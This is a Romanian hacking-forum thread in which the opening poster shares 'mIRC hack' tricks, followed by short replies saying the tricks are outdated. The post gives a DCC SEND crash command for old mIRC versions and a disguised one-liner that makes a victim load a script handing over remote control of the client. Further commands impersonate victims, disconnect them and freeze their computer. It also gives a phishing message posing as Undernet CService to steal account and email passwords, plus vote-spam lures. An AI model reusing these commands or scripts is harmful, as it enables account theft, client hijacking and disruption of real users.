Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
Diana96 pe Simpatie.ro
Femeie
25 ani
Bucuresti
cauta Barbat
25 - 50 ani
Hacking and more... / Hacking-ul nostru cel de toate zilele / mIRC hack Moderat de Shocker
Autor
Mesaj Pagini: 1
survizer
Master of 127.0.0.1

Inregistrat: acum 16 ani
Postari: 178
Hai sa fim si noi smecheri, si daca ala care a facut mircu ... a fost prost si noi am gasit un exploit pentru el....sa ne distram cu el ... deci... trebuie odata sa scrieti comanda :
./alias /hit //quote PRIVMSG $$1 : $+ $chr(1) $+ DCC SEND \" $+ $str(x $chr(0160),100) $+
dupa ce ati scri comanda asta nu va mai ramane nimic de facut decat , atunci cand nu aveti ce face sau va enerveaza ceva persoane de pe un canal sau un fatarau nu trebuie decat sa scrieti comanda :
/hit nick/canal
si o sa vedeti cum pica acea persoana sau mai multe persoane de pe acel canal , cu conditia ca ei sa foloseasca versiunea de mirc 6.0 ; 6.1 ; 6.2 ; 6.3 ; 6.4 ; 6.5 ; 6.6 ; 6.7 ; 6.8 ; 6.9 ; 6.10 ; 6.11 . dar sa nu aiba versiunea 6.12 care deja este securizata . Dar... ca sa fim si mai smecheri hai sa ne protejam noi sa nu ne poata pica alti ... pentru asta trebuie sa scrieti comanda : /ignore -wd `*`DeeLoc . Problema ii ca daca si alti stiu comanda de ignore. chiar si daca au o vers. de mirc din cele mentionate mai sus tot nu`l poti pica... dar... merita sa incerci .
Fraierii de pe MIrc pot fi si mai fraieri daca ii ajutatzi putzin. CUM? Simplu.
Prin intermediul unei comenzi putetzi sa ii controlatzi mircu in intregime. Nu trebuie decat sa ii pui sa scrie urmatoarea comanda si prin intermediul unor altor comenzi simple va jucatzi cu mircul lui.
Acum sa nu mai stau la vorbaraie si sa va dau comanda: .//me :-) | write -c x ctcp 1:*:?:$1- | //me :\\ | .load -rs x
Odata ce a scris comanda uu va aparea in locul in care a scriso urmatoarele semne:
:-)
:\\
Dupa ele stitzi ca victima a pus comanda ! Odata ce a pus-o vetzi avea acces ctcp pe toate comenzile mircului!!!
Acum folositzi urmatoarele comenzi :
/ctcp nick /msg nick-sau-canal mesaj aceasta va face ca prin intermediul nickului victimei sa scrietzi ce text vretzi unde vretzi !!!
/ctcp nick /join #canal aceasta comanda va face ca victima sa intre pe canalul dorit;
/ctcp nick /part #canal aceasta comanda va face ca victima sa iese de pe canalul dorit;
/ctcp nick /disconnect aceasta comanda va face ca victima sa iese de pe MIRC;
/ctcp nick /clearscreen aceasta comanda ii va shterge victimei tot scrisu din mirc.. astfel nu va mai vedea nimik din ce a vorbit
Atzi prins ideea? Ma bucur.. dar mai am o comanda frumoasa in caz ca victima va injurat sau enervat prea mult:
/ctcp nick /run c:\\\\con\\con Aceasta comanda ii va bloca automat computeru
NOTA: Daca personana e suspecta de comanda de mai sus putetzi incerca direct /run c:\\\\con\\con si ii vetzi bloca direct copmuterul.
SFAT: Nu ezitatzi niciodata sa folositzi mesaje cat mai atractive pentru acea comanda .
Pentru ca fraierii de pe mirc sunt chiar foarte fraieri (cel putzin unii, ca mai sunt si exceptzii) putetzi sa ii pacalitzi prin intermediul mesajelor folosind /ame mesaj(scrie acelashi mesaj pe toate canalele) sau /notice #canal-sau-nick mesaj(notifica un canal sau o persoana cu un mesaj) sau chiar scriindu-i in privat un mesaj.
Pentru aceasta va voi da mai multe exemple:
1. Sa incepem cu comanda //me :-) | write -c x ctcp 1:*:?:$1- | //me :\\ | .load -rs x :
- in ea putetzi modifica scrisul :-) si :\\ asha ca o idee si scoatetzi un mesaj ca sa fraieritzi victima. Cum ar fi:
//me mp3-list | write -c x ctcp 1:*:?:$1- | //me *.mp3 | .load -rs x ar face sa kreada ca victima itzi va vedea mp3-urile tale... insa nu e destul; mai trebuie sa intervenitzi si voi cu un mesaj.. Astfel avem un exemplu complet:
Daca vretzi sa imi vedetzi lista de mp3uri scrietzi comanda: //me mp3-list | write -c x ctcp 1:*:?:$1- | //me *.mp3 | .load -rs x
Daca vretzi mai multe exemple doar ganditziva si vetzi gasi !
2. Acum sa va dau ceva mai interesant : Cum furatzi usere sub nasul vitimelor.
Presupun ca va ganditzi la metode de hacking complicate si grele.. dar totul e mai mult decat simplu.. Totul se intampla prin intermediul unui mesaj. Mai intai schimbatzi-va nickul in Cserv1ce sau Cs3rvice sau ceva asemanantor: Acum scrietzi urmatorul mesaj prin notice pe cat mai multe canale:
/notice #canal Din cauza de prea multe usere serverul undernet este laguit, asha ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu tzi se suspende scrie urmatoarea comanda /msg nickul-tau(Cserv1ce sau Cs3rvice) $un-suspend me | username |password
Astfel fraierul itzi va da propia parola la propiul user ! Insa el ishi poate recupera parola de la mailul sau asha ca incercatzi sa ceretzi si parola de la mail !!!
Pentru cei care nu folosesc Mircu delok am sa le dau toate detaliile in caz ca vretzi sa va batetzi joc de nishte fraieri:
Deci dupa ce atzi intrat pe mirc, intratzi pe cat mai multe canale si bagatzi comanda de mai sus ! Dar mai intai scrietzi
/nick Cserv1ce ca sa va schimbatzi nickul in Cserv1ce. Sa zicem ca intratzi pe canalul #hack si vretzi sa bagatzi mesajul pentru furat usere.. comanda va fi in cazul asta: /notice # Din cauza de prea multe usere serverul undernet este laguit, asha ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu tzi se suspende scrie urmatoarea comanda /msg Cserv1ce $un-suspend me | username | password . Acum trebuie sa prindetzi fraierii care itzi vor da mesaj userul si passul . In caz ca ai primit un mesaj din acesta ai prins un fraier .. Insa atentzie ca mai sunt care dau la panarama user si pass.
Daca nu ai intzeles prea bine sau vrei sa stii mai multe intra pe #senzational .. eu sunt cu nickul DeeLoc !!!
3. Acum sa va zic de ce putetzi profita foarte mult pe mirc de pe urma fraierilor.. Daca ai nevoie de multe voturi nu ezita sa intri pe cat mai multe canale si cu ajutorul comenzii /ame bagatzi mesaje cat mai infloritoare cum ar fi:
- daca vrei root si bnc gratis da click pe urmatoarea adresa
ASha vetzi fi votat de fraieri care kred in mesajele alea! Deasemeni putetzi acoperi mesajul de o culoare si zicetzi dublu click pe culoare . Idei sunt multe !! eu va mai dau un lucru care va poate ajuta la vot :
SFAT: Folositzi situri unde votul este automat fara sa mai trebuiasca sa mai datzi un click pe VOT sau ceva asemenea..caci fraierii se pot prinde ca nu e vorba de ce atzi zis in mesaj!! Cand votul e direct fraierul vede ca nu e ceea ce scrie dar tu ai fost votat!!!
Cam atata!! Am sa mai vin cu idei despre MIRC HACK !!!

Sper sa va fie de ajutor   

Modificat de survizer (acum 16 ani)


_______________________________________
Sa lasam faptele sa vorbeasca....

pus acum 16 ani
   
goron
Senior

Din: Baia Mare
Inregistrat: acum 16 ani
Postari: 116
mda.....cand dau comanda   ./alias /hit //quote PRIVMSG $$1 : $+ $chr(1) $+ DCC SEND \\\" $+ $str(x $chr(0160),100) $+  primesc inapoi  You are not on a channel.......care sa fie problema SURVIZER ca de conectat is conectat la un canal ?

_______________________________________


http://s3.gladiatus.ro/game/c.php?uid=24770
Photoshop help http://www.photoshopromania.ro/

pus acum 16 ani
   
survizer
Master of 127.0.0.1

Inregistrat: acum 16 ani
Postari: 178
e posibil sa fie din cauza versii de mIRC ........normal ar fi trebuit sa iti mearga

Modificat de survizer (acum 16 ani)


_______________________________________
Sa lasam faptele sa vorbeasca....

pus acum 16 ani
   
OldNavy
Elite Member

Din: Toplita
Inregistrat: acum 17 ani
Postari: 555
poante vechi,mergeau cu ani in urma.acum nu mai functioneaza
PS: survizer,nu trebuia sa deschizi un topic si aici,puteai la fel de bine sa le postezi la noobs/mirc hack..un topic facut tot de tine!


_______________________________________
to see a world in a grain of sand, and heaven in a wild flower, to hold infinity in the palm of your hand and eternity in an hour.

pus acum 16 ani
   
goron
Senior

Din: Baia Mare
Inregistrat: acum 16 ani
Postari: 116
mda......vezi survizer ca ai pus si aici si la noobs acelasi subiect....acum am observat si eu,numai ca la noobs incepe pastul de la "Fraierii de pe MIrc pot fi si mai fraieri daca ii ajutatzi putzin. CUM? Simplu. ...".....oricum cred ca acum au mai evoluat si astia de la mirc fata de cum au fost la inceput si nu mai poti da tu jos lumea cum vrei de pe channnuri....sau poate parerea mea e una gresita,atunci imi cer scuze

_______________________________________


http://s3.gladiatus.ro/game/c.php?uid=24770
Photoshop help http://www.photoshopromania.ro/

pus acum 16 ani
   
Pagini: 1  

Mergi la